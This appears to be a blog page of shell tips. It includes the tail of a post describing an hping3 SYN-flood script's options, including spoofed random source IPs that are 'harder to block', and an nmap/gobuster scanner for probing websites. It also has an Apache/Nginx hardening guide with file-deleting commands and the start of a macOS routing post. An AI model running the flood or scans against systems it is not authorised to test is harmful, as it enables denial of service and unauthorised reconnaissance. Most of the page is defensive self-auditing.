Parameter 5: RANDOMIZE_SOURCE (OPTIONAL)

  • true: Use randomized source IPs (–rand-source flag)
    Makes packets appear from random IPs, harder to block
  • false: Use actual source IP (no randomization)
    Easier to trace and debug, simpler firewall rules
  • Default: true (if parameter not specified)

Important Considerations ⚠️

• Permissions: hping3 requires root or superuser privileges to craft and send raw packets. You’ll need to run this script with sudo.

• Legal and Ethical Use: This tool is for ethical and educational purposes only. Using this script to perform a SYN flood attack on a network or system you do not own or have explicit permission to test is illegal. Use it in a controlled lab environment.

0
0

Macbook: Useful/Basic NMAP script to check for vulnerabilities and create a formatted report

If you want to quickly health check your website, then the following script is a simple NMAP script that scans your site for common issues and formats the results in a nice report style.

#!/bin/bash

# Nmap Vulnerability Scanner with Severity Grouping, TLS checks, and Directory Discovery
# Usage: ./vunscan.sh <target_domain>

# Colors for output
RED='\033[0;31m'
ORANGE='\033[0;33m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
GREEN='\033[0;32m'
NC='\033[0m' # No Color

# Check if target is provided
if [ $# -eq 0 ]; then
    echo "Usage: $0 <target_domain>"
    echo "Example: $0 example.com"
    exit 1
fi

TARGET=$1
TIMESTAMP=$(date +%Y%m%d_%H%M%S)
OUTPUT_DIR="vuln_scan_${TARGET}_${TIMESTAMP}"
RAW_OUTPUT="${OUTPUT_DIR}/raw_scan.xml"
OPEN_PORTS=""

# Debug output
echo "DEBUG: TARGET=$TARGET"
echo "DEBUG: TIMESTAMP=$TIMESTAMP"
echo "DEBUG: OUTPUT_DIR=$OUTPUT_DIR"
echo "DEBUG: RAW_OUTPUT=$RAW_OUTPUT"

# Create output directory
mkdir -p "$OUTPUT_DIR"
if [ ! -d "$OUTPUT_DIR" ]; then
    echo -e "${RED}Error: Failed to create output directory $OUTPUT_DIR${NC}"
    exit 1
fi

echo "================================================================"
echo "         Vulnerability Scanner for $TARGET"
echo "================================================================"
echo "Scan started at: $(date)"
echo "Results will be saved in: $OUTPUT_DIR"
echo ""

# Function to print section headers
print_header() {
    echo -e "\n${BLUE}================================================================${NC}"
    echo -e "${BLUE}$1${NC}"
    echo -e "${BLUE}================================================================${NC}"
}

# Function to run nmap scan
run_scan() {
    print_header "Running Comprehensive Vulnerability Scan"
    echo "This may take several minutes…"
    
    # First, determine which ports are open
    echo "Phase 1: Port discovery..."
    echo "Scanning for open ports (this may take a while)..."
    
    # Try a faster scan first on common ports
    nmap -p 1-1000,8080,8443,3306,5432,27017 --open -T4 "$TARGET" -oG "${OUTPUT_DIR}/open_ports_quick.txt" 2>/dev/null
    
    # If user wants full scan, uncomment the next line and comment the previous one
    # nmap -p- --open -T4 "$TARGET" -oG "${OUTPUT_DIR}/open_ports.txt" 2>/dev/null
    
    # Extract open ports
    if [ -f "${OUTPUT_DIR}/open_ports_quick.txt" ]; then
        OPEN_PORTS=$(grep -oE '[0-9]+/open' "${OUTPUT_DIR}/open_ports_quick.txt" 2>/dev/null | cut -d'/' -f1 | tr '\n' ',' | sed 's/,$//')
    fi
    
    # If no ports found, try common web ports
    if [ -z "$OPEN_PORTS" ] || [ "$OPEN_PORTS" = "" ]; then
        echo -e "${YELLOW}Warning: No open ports found in quick scan. Checking common web ports...${NC}"
        
        # Test common ports individually
        COMMON_PORTS="80,443,8080,8443,22,21,25,3306,5432"
        OPEN_PORTS=""
        
        for port in $(echo $COMMON_PORTS | tr ',' ' '); do
            echo -n "Testing port $port... "
            if nmap -p $port --open "$TARGET" 2>/dev/null | grep -q "open"; then
                echo "open"
                if [ -z "$OPEN_PORTS" ]; then
                    OPEN_PORTS="$port"
                else
                    OPEN_PORTS="$OPEN_PORTS,$port"
                fi
            else
                echo "closed/filtered"
            fi
        done
    fi
    
    # Final fallback
    if [ -z "$OPEN_PORTS" ] || [ "$OPEN_PORTS" = "" ]; then
        echo -e "${YELLOW}Warning: No open ports detected. Using default web ports for scanning.${NC}"
        OPEN_PORTS="80,443"
    fi
    
    echo ""
    echo "Ports to scan: $OPEN_PORTS"
    echo ""
    
    # Main vulnerability scan with http-vulners-regex
    echo "Phase 2: Vulnerability scanning..."
    nmap -sV -sC --script vuln,http-vulners-regex \
         --script-args vulns.showall,http-vulners-regex.paths={/} \
         -p "$OPEN_PORTS" \
         -oX "$RAW_OUTPUT" \
         -oN "${OUTPUT_DIR}/scan_normal.txt" \
         "$TARGET"
    
    if [ $? -ne 0 ]; then
        echo -e "${RED}Error: Nmap scan failed${NC}"
        # Don't exit, continue with other scans
    fi
}

# Function to parse and categorize vulnerabilities
parse_vulnerabilities() {
    print_header "Parsing and Categorizing Vulnerabilities"
    
    # Initialize arrays
    declare -a critical_vulns=()
    declare -a high_vulns=()
    declare -a medium_vulns=()
    declare -a low_vulns=()
    declare -a info_vulns=()
    
    # Create temporary files for each severity
    CRITICAL_FILE="${OUTPUT_DIR}/critical.tmp"
    HIGH_FILE="${OUTPUT_DIR}/high.tmp"
    MEDIUM_FILE="${OUTPUT_DIR}/medium.tmp"
    LOW_FILE="${OUTPUT_DIR}/low.tmp"
    INFO_FILE="${OUTPUT_DIR}/info.tmp"
    
    # Clear temp files
    > "$CRITICAL_FILE"
    > "$HIGH_FILE"
    > "$MEDIUM_FILE"
    > "$LOW_FILE"
    > "$INFO_FILE"
    
    # Parse XML output for vulnerabilities
    if [ -f "$RAW_OUTPUT" ]; then
        # Extract script output and categorize by common vulnerability indicators
        grep -A 20 '<script id=".*vuln.*"' "$RAW_OUTPUT" | while read line; do
            if echo "$line" | grep -qi "CRITICAL\|CVE.*CRITICAL\|score.*9\|score.*10"; then
                echo "$line" >> "$CRITICAL_FILE"
            elif echo "$line" | grep -qi "HIGH\|CVE.*HIGH\|score.*[7-8]"; then
                echo "$line" >> "$HIGH_FILE"
            elif echo "$line" | grep -qi "MEDIUM\|CVE.*MEDIUM\|score.*[4-6]"; then
                echo "$line" >> "$MEDIUM_FILE"
            elif echo "$line" | grep -qi "LOW\|CVE.*LOW\|score.*[1-3]"; then
                echo "$line" >> "$LOW_FILE"
            elif echo "$line" | grep -qi "INFO\|INFORMATION"; then
                echo "$line" >> "$INFO_FILE"
            fi
        done
        
        # Also parse normal output for vulnerability information
        if [ -f "${OUTPUT_DIR}/scan_normal.txt" ]; then
            # Look for common vulnerability patterns in normal output
            grep -E "(CVE-|VULNERABLE|State: VULNERABLE)" "${OUTPUT_DIR}/scan_normal.txt" | while read vuln_line; do
                if echo "$vuln_line" | grep -qi "critical\|9\.[0-9]\|10\.0"; then
                    echo "$vuln_line" >> "$CRITICAL_FILE"
                elif echo "$vuln_line" | grep -qi "high\|[7-8]\.[0-9]"; then
                    echo "$vuln_line" >> "$HIGH_FILE"
                elif echo "$vuln_line" | grep -qi "medium\|[4-6]\.[0-9]"; then
                    echo "$vuln_line" >> "$MEDIUM_FILE"
                elif echo "$vuln_line" | grep -qi "low\|[1-3]\.[0-9]"; then
                    echo "$vuln_line" >> "$LOW_FILE"
                else
                    echo "$vuln_line" >> "$INFO_FILE"
                fi
            done
        fi
    fi
}

# Function to display vulnerabilities by severity
display_results() {
    print_header "VULNERABILITY SCAN RESULTS"
    
    # Critical Vulnerabilities
    echo -e "\n${RED}🔴 CRITICAL SEVERITY VULNERABILITIES${NC}"
    echo "=================================================="
    if [ -s "${OUTPUT_DIR}/critical.tmp" ]; then
        cat "${OUTPUT_DIR}/critical.tmp" | head -20
        CRITICAL_COUNT=$(wc -l < "${OUTPUT_DIR}/critical.tmp")
        echo -e "${RED}Total Critical: $CRITICAL_COUNT${NC}"
    else
        echo -e "${GREEN}✓ No critical vulnerabilities found${NC}"
    fi
    
    # High Vulnerabilities
    echo -e "\n${ORANGE}🟠 HIGH SEVERITY VULNERABILITIES${NC}"
    echo "============================================="
    if [ -s "${OUTPUT_DIR}/high.tmp" ]; then
        cat "${OUTPUT_DIR}/high.tmp" | head -15
        HIGH_COUNT=$(wc -l < "${OUTPUT_DIR}/high.tmp")
        echo -e "${ORANGE}Total High: $HIGH_COUNT${NC}"
    else
        echo -e "${GREEN}✓ No high severity vulnerabilities found${NC}"
    fi
    
    # Medium Vulnerabilities
    echo -e "\n${YELLOW}🟡 MEDIUM SEVERITY VULNERABILITIES${NC}"
    echo "==============================================="
    if [ -s "${OUTPUT_DIR}/medium.tmp" ]; then
        cat "${OUTPUT_DIR}/medium.tmp" | head -10
        MEDIUM_COUNT=$(wc -l < "${OUTPUT_DIR}/medium.tmp")
        echo -e "${YELLOW}Total Medium: $MEDIUM_COUNT${NC}"
    else
        echo -e "${GREEN}✓ No medium severity vulnerabilities found${NC}"
    fi
    
    # Low Vulnerabilities
    echo -e "\n${BLUE}🔵 LOW SEVERITY VULNERABILITIES${NC}"
    echo "=========================================="
    if [ -s "${OUTPUT_DIR}/low.tmp" ]; then
        cat "${OUTPUT_DIR}/low.tmp" | head -8
        LOW_COUNT=$(wc -l < "${OUTPUT_DIR}/low.tmp")
        echo -e "${BLUE}Total Low: $LOW_COUNT${NC}"
    else
        echo -e "${GREEN}✓ No low severity vulnerabilities found${NC}"
    fi
    
    # Information/Other
    echo -e "\n${GREEN}ℹ️  INFORMATIONAL${NC}"
    echo "========================="
    if [ -s "${OUTPUT_DIR}/info.tmp" ]; then
        cat "${OUTPUT_DIR}/info.tmp" | head -5
        INFO_COUNT=$(wc -l < "${OUTPUT_DIR}/info.tmp")
        echo -e "${GREEN}Total Info: $INFO_COUNT${NC}"
    else
        echo "No informational items found"
    fi
}

# Function to run gobuster scan for enhanced directory discovery
run_gobuster_scan() {
    echo "Running gobuster directory scan..."
    
    GOBUSTER_RESULTS="${OUTPUT_DIR}/gobuster_results.txt"
    PERMISSION_ANALYSIS="${OUTPUT_DIR}/gobuster_permissions.txt"
    > "$PERMISSION_ANALYSIS"
    
    for port in $(echo "$WEB_PORTS" | tr ',' ' '); do
        PROTOCOL="http"
        if [[ "$port" == "443" || "$port" == "8443" ]]; then
            PROTOCOL="https"
        fi
        
        echo "Scanning $PROTOCOL://$TARGET:$port with gobuster..."
        
        # Run gobuster with common wordlist
        if [ -f "/usr/share/wordlists/dirb/common.txt" ]; then
            WORDLIST="/usr/share/wordlists/dirb/common.txt"
        elif [ -f "/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt" ]; then
            WORDLIST="/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt"
        else
            # Create a small built-in wordlist
            WORDLIST="${OUTPUT_DIR}/temp_wordlist.txt"
            cat > "$WORDLIST" <<EOF
admin
administrator
api
backup
bin
cgi-bin
config
data
database
db
debug
dev
development
doc
docs
documentation
download
downloads
error
errors
export
files
hidden
images
img
include
includes
js
library
log
logs
manage
management
manager
media
old
private
proc
public
resources
scripts
secret
secure
server-status
staging
static
storage
system
temp
templates
test
testing
tmp
upload
uploads
users
var
vendor
web
webapp
wp-admin
wp-content
.git
.svn
.env
.htaccess
.htpasswd
robots.txt
sitemap.xml
web.config
phpinfo.php
info.php
test.php
EOF
        fi
        
        # Run gobuster with status code analysis
        gobuster dir -u "$PROTOCOL://$TARGET:$port" \
                    -w "$WORDLIST" \
                    -k \
                    -t 10 \
                    --no-error \
                    -o "${GOBUSTER_RESULTS}_${port}.txt" \
                    -s "200,204,301,302,307,401,403,405" 2>/dev/null
        
        # Analyze results for permission issues
        if [ -f "${GOBUSTER_RESULTS}_${port}.txt" ]; then
            echo "Analyzing gobuster results for permission issues..."
            
            # Check for 403 Forbidden directories
            grep "Status: 403" "${GOBUSTER_RESULTS}_${port}.txt" | while read line; do
                dir=$(echo "$line" | awk '{print $1}')
                echo -e "${ORANGE}[403 Forbidden]${NC} $PROTOCOL://$TARGET:$port$dir - Directory exists but access denied" >> "$PERMISSION_ANALYSIS"
                echo -e "${ORANGE}  Permission Issue:${NC} $PROTOCOL://$TARGET:$port$dir (403 Forbidden)"
            done
            
            # Check for 401 Unauthorized directories
            grep "Status: 401" "${GOBUSTER_RESULTS}_${port}.txt" | while read line; do
                dir=$(echo "$line" | awk '{print $1}')
                echo -e "${YELLOW}[401 Unauthorized]${NC} $PROTOCOL://$TARGET:$port$dir - Authentication required" >> "$PERMISSION_ANALYSIS"
                echo -e "${YELLOW}  Auth Required:${NC} $PROTOCOL://$TARGET:$port$dir (401 Unauthorized)"
            done
            
            # Check for directory listing enabled (potentially dangerous)
            grep "Status: 200" "${GOBUSTER_RESULTS}_${port}.txt" | while read line; do
                dir=$(echo "$line" | awk '{print $1}')
                # Check if it's a directory by looking for trailing slash or common directory patterns
                if [[ "$dir" =~ /$ ]] || [[ ! "$dir" =~ \. ]]; then
                    # Test if directory listing is enabled
                    RESPONSE=$(curl -k -s --max-time 5 "$PROTOCOL://$TARGET:$port$dir" 2>/dev/null)
                    if echo "$RESPONSE" | grep -qi "index of\|directory listing\|parent directory\|<pre>\|<dir>"; then
                        echo -e "${RED}[Directory Listing Enabled]${NC} $PROTOCOL://$TARGET:$port$dir - SECURITY RISK" >> "$PERMISSION_ANALYSIS"
                        echo -e "${RED}  🚨 Directory Listing:${NC} $PROTOCOL://$TARGET:$port$dir"
                    fi
                fi
            done
            
            # Check for sensitive files with incorrect permissions
            for sensitive_file in ".git/config" ".env" ".htpasswd" "web.config" "phpinfo.php" "info.php" ".DS_Store" "Thumbs.db"; do
                if grep -q "/$sensitive_file.*Status: 200" "${GOBUSTER_RESULTS}_${port}.txt"; then
                    echo -e "${RED}[Sensitive File Exposed]${NC} $PROTOCOL://$TARGET:$port/$sensitive_file - CRITICAL SECURITY RISK" >> "$PERMISSION_ANALYSIS"
                    echo -e "${RED}  🚨 Sensitive File:${NC} $PROTOCOL://$TARGET:$port/$sensitive_file"
                fi
            done
        fi
    done
    
    # Clean up temporary wordlist if created
    [ -f "${OUTPUT_DIR}/temp_wordlist.txt" ] && rm -f "${OUTPUT_DIR}/temp_wordlist.txt"
    
    # Display permission analysis summary
    if [ -s "$PERMISSION_ANALYSIS" ]; then
        echo ""
        echo -e "${ORANGE}=== Directory Permission Issues Summary ===${NC}"
        cat "$PERMISSION_ANALYSIS"
        
        # Count different types of issues
        FORBIDDEN_COUNT=$(grep -c "403 Forbidden" "$PERMISSION_ANALYSIS" 2>/dev/null || echo 0)
        UNAUTH_COUNT=$(grep -c "401 Unauthorized" "$PERMISSION_ANALYSIS" 2>/dev/null || echo 0)
        LISTING_COUNT=$(grep -c "Directory Listing Enabled" "$PERMISSION_ANALYSIS" 2>/dev/null || echo 0)
        SENSITIVE_COUNT=$(grep -c "Sensitive File Exposed" "$PERMISSION_ANALYSIS" 2>/dev/null || echo 0)
        
        echo ""
        echo "Permission Issue Statistics:"
        echo "  - 403 Forbidden directories: $FORBIDDEN_COUNT"
        echo "  - 401 Unauthorized directories: $UNAUTH_COUNT"
        echo "  - Directory listings enabled: $LISTING_COUNT"
        echo "  - Sensitive files exposed: $SENSITIVE_COUNT"
    fi
}

# Function to run TLS/SSL checks
run_tls_checks() {
    print_header "Running TLS/SSL Security Checks"
    
    # Check for HTTPS ports
    HTTPS_PORTS=$(echo "$OPEN_PORTS" | tr ',' '\n' | grep -E '443|8443' | tr '\n' ',' | sed 's/,$//')
    if [ -z "$HTTPS_PORTS" ]; then
        HTTPS_PORTS="443"
        echo "No HTTPS ports found in scan, checking default port 443..."
    fi
    
    echo "Checking TLS/SSL on ports: $HTTPS_PORTS"
    
    # Run SSL scan using nmap ssl scripts
    nmap -sV --script ssl-cert,ssl-enum-ciphers,ssl-known-key,ssl-ccs-injection,ssl-heartbleed,ssl-poodle,sslv2,tls-alpn,tls-nextprotoneg \
         -p "$HTTPS_PORTS" \
         -oN "${OUTPUT_DIR}/tls_scan.txt" \
         "$TARGET" 2>/dev/null
    
    # Parse TLS results
    TLS_ISSUES_FILE="${OUTPUT_DIR}/tls_issues.txt"
    > "$TLS_ISSUES_FILE"
    
    # Check for weak ciphers
    if grep -q "TLSv1.0\|SSLv2\|SSLv3" "${OUTPUT_DIR}/tls_scan.txt" 2>/dev/null; then
        echo "CRITICAL: Outdated SSL/TLS protocols detected" >> "$TLS_ISSUES_FILE"
    fi
    
    # Check for weak cipher suites
    if grep -q "DES\|RC4\|MD5" "${OUTPUT_DIR}/tls_scan.txt" 2>/dev/null; then
        echo "HIGH: Weak cipher suites detected" >> "$TLS_ISSUES_FILE"
    fi
    
    # Check for certificate issues
    if grep -q "expired\|self-signed" "${OUTPUT_DIR}/tls_scan.txt" 2>/dev/null; then
        echo "MEDIUM: Certificate issues detected" >> "$TLS_ISSUES_FILE"
    fi
    
    # Display TLS results
    echo ""
    if [ -s "$TLS_ISSUES_FILE" ]; then
        echo -e "${RED}TLS/SSL Issues Found:${NC}"
        cat "$TLS_ISSUES_FILE"
    else
        echo -e "${GREEN}✓ No major TLS/SSL issues detected${NC}"
    fi
    echo ""
}

# Function to run directory busting and permission checks
run_dirbuster() {
    print_header "Running Directory Discovery and Permission Checks"
    
    # Check for web ports
    WEB_PORTS=$(echo "$OPEN_PORTS" | tr ',' '\n' | grep -E '^(80|443|8080|8443)$' | tr '\n' ',' | sed 's/,$//')
    if [ -z "$WEB_PORTS" ]; then
        echo "No standard web ports found in open ports, checking defaults..."
        WEB_PORTS="80,443"
    fi
    
    echo "Running directory discovery on web ports: $WEB_PORTS"
    
    # Check if gobuster is available
    if command -v gobuster &> /dev/null; then
        echo -e "${GREEN}Using gobuster for enhanced directory discovery and permission checks${NC}"
        run_gobuster_scan
    else
        echo -e "${YELLOW}Gobuster not found. Using fallback method.${NC}"
        echo -e "${YELLOW}Install gobuster for enhanced directory permission checks: brew install gobuster${NC}"
    fi
    
    # Use nmap's http-enum script for directory discovery
    nmap -sV --script http-enum \
         --script-args http-enum.basepath='/' \
         -p "$WEB_PORTS" \
         -oN "${OUTPUT_DIR}/dirbuster.txt" \
         "$TARGET" 2>/dev/null
    
    # Common directory wordlist (built-in small list)
    COMMON_DIRS="admin administrator backup api config test dev staging uploads download downloads files documents images img css js scripts cgi-bin wp-admin phpmyadmin .git .svn .env .htaccess robots.txt sitemap.xml"
    
    # Quick check for common directories using curl
    DIRS_FOUND_FILE="${OUTPUT_DIR}/directories_found.txt"
    > "$DIRS_FOUND_FILE"
    
    for port in $(echo "$WEB_PORTS" | tr ',' ' '); do
        PROTOCOL="http"
        if [[ "$port" == "443" || "$port" == "8443" ]]; then
            PROTOCOL="https"
        fi
        
        echo "Checking common directories on $PROTOCOL://$TARGET:$port"
        
        for dir in $COMMON_DIRS; do
            URL="$PROTOCOL://$TARGET:$port/$dir"
            STATUS=$(curl -k -s -o /dev/null -w "%{http_code}" --max-time 3 "$URL" 2>/dev/null)
            
            if [[ "$STATUS" == "200" || "$STATUS" == "301" || "$STATUS" == "302" || "$STATUS" == "401" || "$STATUS" == "403" ]]; then
                echo "[$STATUS] $URL" >> "$DIRS_FOUND_FILE"
                echo -e "${GREEN}Found:${NC} [$STATUS] $URL"
                
                # Check for permission issues
                if [[ "$STATUS" == "403" ]]; then
                    echo -e "${ORANGE}  ⚠️  Permission denied (403) - Possible misconfiguration${NC}"
                    echo "[PERMISSION ISSUE] 403 Forbidden: $URL" >> "${OUTPUT_DIR}/permission_issues.txt"
                elif [[ "$STATUS" == "401" ]]; then
                    echo -e "${YELLOW}  🔒 Authentication required (401)${NC}"
                    echo "[AUTH REQUIRED] 401 Unauthorized: $URL" >> "${OUTPUT_DIR}/permission_issues.txt"
                fi
            fi
        done
    done
    
    # Display results
    echo ""
    if [ -s "$DIRS_FOUND_FILE" ]; then
        echo -e "${YELLOW}Directories/Files discovered:${NC}"
        cat "$DIRS_FOUND_FILE"
    else
        echo "No additional directories found"
    fi
    
    # Display permission issues if found
    if [ -s "${OUTPUT_DIR}/permission_issues.txt" ]; then
        echo ""
        echo -e "${ORANGE}Directory Permission Issues Found:${NC}"
        cat "${OUTPUT_DIR}/permission_issues.txt"
    fi
    echo ""
}

# Function to generate summary report
generate_summary() {
    print_header "SCAN SUMMARY"
    
    CRITICAL_COUNT=0
    HIGH_COUNT=0
    MEDIUM_COUNT=0
    LOW_COUNT=0
    INFO_COUNT=0
    
    [ -f "${OUTPUT_DIR}/critical.tmp" ] && CRITICAL_COUNT=$(wc -l < "${OUTPUT_DIR}/critical.tmp")
    [ -f "${OUTPUT_DIR}/high.tmp" ] && HIGH_COUNT=$(wc -l < "${OUTPUT_DIR}/high.tmp")
    [ -f "${OUTPUT_DIR}/medium.tmp" ] && MEDIUM_COUNT=$(wc -l < "${OUTPUT_DIR}/medium.tmp")
    [ -f "${OUTPUT_DIR}/low.tmp" ] && LOW_COUNT=$(wc -l < "${OUTPUT_DIR}/low.tmp")
    [ -f "${OUTPUT_DIR}/info.tmp" ] && INFO_COUNT=$(wc -l < "${OUTPUT_DIR}/info.tmp")
    
    echo "Target: $TARGET"
    echo "Scan Date: $(date)"
    echo ""
    echo -e "${RED}Critical:       $CRITICAL_COUNT${NC}"
    echo -e "${ORANGE}High:           $HIGH_COUNT${NC}"
    echo -e "${YELLOW}Medium:         $MEDIUM_COUNT${NC}"
    echo -e "${BLUE}Low:            $LOW_COUNT${NC}"
    echo -e "${GREEN}Informational:  $INFO_COUNT${NC}"
    echo ""
    
    TOTAL=$((CRITICAL_COUNT + HIGH_COUNT + MEDIUM_COUNT + LOW_COUNT))
    echo "Total Vulnerabilities: $TOTAL"
    
    # Risk assessment
    if [ $CRITICAL_COUNT -gt 0 ]; then
        echo -e "${RED}🚨 RISK LEVEL: CRITICAL - Immediate action required!${NC}"
    elif [ $HIGH_COUNT -gt 0 ]; then
        echo -e "${ORANGE}⚠️  RISK LEVEL: HIGH - Action required soon${NC}"
    elif [ $MEDIUM_COUNT -gt 0 ]; then
        echo -e "${YELLOW}⚡ RISK LEVEL: MEDIUM - Should be addressed${NC}"
    elif [ $LOW_COUNT -gt 0 ]; then
        echo -e "${BLUE}📋 RISK LEVEL: LOW - Monitor and plan fixes${NC}"
    else
        echo -e "${GREEN}✅ RISK LEVEL: MINIMAL - Good security posture${NC}"
    fi
    
    # Save summary to file
    {
        echo "Vulnerability Scan Summary for $TARGET"
        echo "======================================"
        echo "Scan Date: $(date)"
        echo ""
        echo "Critical: $CRITICAL_COUNT"
        echo "High: $HIGH_COUNT"
        echo "Medium: $MEDIUM_COUNT"
        echo "Low: $LOW_COUNT"
        echo "Informational: $INFO_COUNT"
        echo "Total: $TOTAL"
        echo ""
        echo "Additional Checks:"
        [ -f "${OUTPUT_DIR}/tls_issues.txt" ] && [ -s "${OUTPUT_DIR}/tls_issues.txt" ] && echo "TLS/SSL Issues: $(wc -l < "${OUTPUT_DIR}/tls_issues.txt")"
        [ -f "${OUTPUT_DIR}/directories_found.txt" ] && [ -s "${OUTPUT_DIR}/directories_found.txt" ] && echo "Directories Found: $(wc -l < "${OUTPUT_DIR}/directories_found.txt")"
        [ -f "${OUTPUT_DIR}/gobuster_permissions.txt" ] && [ -s "${OUTPUT_DIR}/gobuster_permissions.txt" ] && echo "Directory Permission Issues: $(wc -l < "${OUTPUT_DIR}/gobuster_permissions.txt")"
    } > "${OUTPUT_DIR}/summary.txt"
}

# Main execution
main() {
    echo "Starting vulnerability scan for $TARGET…"
    
    # Check if required tools are installed
    if ! command -v nmap &> /dev/null; then
        echo -e "${RED}Error: nmap is not installed. Please install nmap first.${NC}"
        exit 1
    fi
    
    if ! command -v curl &> /dev/null; then
        echo -e "${RED}Error: curl is not installed. Please install curl first.${NC}"
        exit 1
    fi
    
    # Check for optional tools
    if command -v gobuster &> /dev/null; then
        echo -e "${GREEN}✓ Gobuster found - Enhanced directory scanning enabled${NC}"
    else
        echo -e "${YELLOW}ℹ️  Gobuster not found - Basic directory scanning will be used${NC}"
        echo -e "${YELLOW}   Install with: brew install gobuster (macOS) or apt install gobuster (Linux)${NC}"
    fi
    
    # Run the main vulnerability scan
    run_scan
    
    # Run TLS/SSL checks
    run_tls_checks
    
    # Run directory discovery
    run_dirbuster
    
    # Parse results
    parse_vulnerabilities
    
    # Display formatted results
    display_results
    
    # Generate summary
    generate_summary
    
    # Cleanup temporary files
    rm -f "${OUTPUT_DIR}"/*.tmp
    
    print_header "SCAN COMPLETE"
    echo "All results saved in: $OUTPUT_DIR"
    echo "Summary saved in: ${OUTPUT_DIR}/summary.txt"
    echo -e "${GREEN}Scan completed at: $(date)${NC}"
}

# Run main function
main

Here’s a comprehensive guide on how to fix each type of directory permission issue that the above script might find (for apache):

## 1. **403 Forbidden Errors**

### What it means:
The directory/file exists but the server is denying access to it.

### How to fix:
# For Apache (.htaccess)
# Add to .htaccess in the directory:
Order deny,allow
Deny from all

# Or remove the directory from web access entirely
# Move sensitive directories outside the web root
mv /var/www/html/backup /var/backups/

# For Nginx
# Add to nginx.conf:
location /admin {
    deny all;
    return 404;  # Return 404 instead of 403 to hide existence
}
## 2. **401 Unauthorized Errors**

### What it means:
Authentication is required but may not be properly configured.

### How to fix:
# For Apache - create .htpasswd file
htpasswd -c /etc/apache2/.htpasswd username

# Add to .htaccess:
AuthType Basic
AuthName "Restricted Access"
AuthUserFile /etc/apache2/.htpasswd
Require valid-user

# For Nginx:
# Install apache2-utils for htpasswd
sudo apt-get install apache2-utils
htpasswd -c /etc/nginx/.htpasswd username

# Add to nginx.conf:
location /admin {
    auth_basic "Restricted Access";
    auth_basic_user_file /etc/nginx/.htpasswd;
}
## 3. **Directory Listing Enabled (CRITICAL)**

### What it means:
Anyone can see all files in the directory - major security risk!

### How to fix:
# For Apache
# Method 1: Add to .htaccess in the directory
Options -Indexes

# Method 2: Add to Apache config (httpd.conf or apache2.conf)
<Directory /var/www/html>
    Options -Indexes
</Directory>

# For Nginx
# Add to nginx.conf (Nginx doesn't have directory listing by default)
# If you see it enabled, remove:
autoindex off;  # This should be the default

# Create index files in empty directories
echo "<!DOCTYPE html><html><head><title>403 Forbidden</title></head><body><h1>403 Forbidden</h1></body></html>" > index.html
## 4. **Sensitive Files Exposed (CRITICAL)**

### Common exposed files and fixes:

#### **.git directory**
# Remove .git from production
rm -rf /var/www/html/.git

# Or block access via .htaccess
<Files ~ "^\.git">
    Order allow,deny
    Deny from all
</Files>

# For Nginx:
location ~ /\.git {
    deny all;
    return 404;
}
#### **.env file**
# Move outside web root
mv /var/www/html/.env /var/www/

# Update your application to read from new location
# In PHP: require_once __DIR__ . '/../.env';

# Block via .htaccess
<Files .env>
    Order allow,deny
    Deny from all
</Files>
#### **Configuration files (config.php, settings.php)**
# Move sensitive configs outside web root
mv /var/www/html/config.php /var/www/config/

# Or restrict access via .htaccess
<Files "config.php">
    Order allow,deny
    Deny from all
</Files>
#### **Backup files**
# Remove backup files from web directory
find /var/www/html -name "*.bak" -o -name "*.backup" -o -name "*.old" | xargs rm -f

# Create a cron job to clean regularly
echo "0 2 * * * find /var/www/html -name '*.bak' -o -name '*.backup' -delete" | crontab -
## 5. **General Security Best Practices**

### Create a comprehensive .htaccess file:
# Disable directory browsing
Options -Indexes

# Deny access to hidden files and directories
<Files .*>
    Order allow,deny
    Deny from all
</Files>

# Deny access to backup and source files
<FilesMatch "(\.(bak|backup|config|dist|fla|inc|ini|log|psd|sh|sql|swp)|~)$">
    Order allow,deny
    Deny from all
</FilesMatch>

# Protect sensitive files
location ~ /(\.htaccess|\.htpasswd|\.env|composer\.json|composer\.lock|package\.json|package-lock\.json)$ {
    deny all;
    return 404;
}

## 6. Quick Security Audit Commands
## Run these commands to find and fix common issues:

# Find all .git directories in web root
find /var/www/html -type d -name .git

# Find all .env files
find /var/www/html -name .env

# Find all backup files
find /var/www/html -type f \( -name "*.bak" -o -name "*.backup" -o -name "*.old" -o -name "*~" \)

# Find directories without index files (potential listing)
find /var/www/html -type d -exec sh -c '[ ! -f "$1/index.html" ] && [ ! -f "$1/index.php" ] && echo "$1"' _ {} \;

# Set proper permissions
find /var/www/html -type d -exec chmod 755 {} \;
find /var/www/html -type f -exec chmod 644 {} \;

## 7. Testing Your Fixes
## After implementing fixes, test them:

# Test that sensitive files are blocked
curl -I https://yoursite.com/.git/config
# Should return 403 or 404

# Test that directory listing is disabled
curl https://yoursite.com/images/
# Should not show a file list

# Run the vunscan.sh script again
./vunscan.sh yoursite.com
# Verify issues are resolved


## 8. Preventive Measures
## 1. Use a deployment script that excludes sensitive files:
bash
## 2. Regular security scans:
bash
## 3. Use a Web Application Firewall (WAF) like ModSecurity or Cloudflare

# Remember: The goal is not just to hide these files (security through obscurity) but to properly secure them or remove them from the web-accessible directory entirely.
0
0

Mac OSX: Altering the OS route table to re-direct the traffic of a website to a different interface (eg re-routing whatsapp traffic to en0)

This was a hard article to figure out the title for! Put simply, your mac book has a route table and if you want to move a specific IP address or dns from one interface to another, then follow the steps below:

First find the IP address of the website that you want to re-route the traffic for:

$ nslookup web.whatsapp.com
Server:		100.64.0.1
Address:	100.64.0.1#53

Non-authoritative answer:
web.whatsapp.com	canonical name = mmx-ds.cdn.whatsapp.net.
Name:	mmx-ds.cdn.whatsapp.net
Address: 102.132.99.60

We want to re-route traffic the traffic from: 102.132.99.60 to the default interface. So first lets find out which interface this traffic is currently being routed to?

$ route -n get web.whatsapp.com
   route to: 102.132.99.60
destination: 102.132.99.60
    gateway: 100.64.0.1
  interface: utun0
      flags: <UP,GATEWAY,HOST,DONE,WASCLONED,IFSCOPE,IFREF>
 recvpipe  sendpipe  ssthresh  rtt,msec    rttvar  hopcount      mtu     expire
       0         0         0        34        21         0      1400         0

So this is currently going to a tunnelled interface called utun0 on gateway 100.64.0.1.

Ok, so I want to move if off this tunnelled interface. So lets first display the kernel routing table. The -n option forces netstat to print the IP addresses. Without this option, netstat attempts to display the host names.

$ netstat - rn | head -n 5
Active Internet connections
Proto Recv-Q Send-Q  Local Address          Foreign Address        (state)
tcp4       0    126  100.64.0.1.64770       136.226.216.14.https   ESTABLISHED
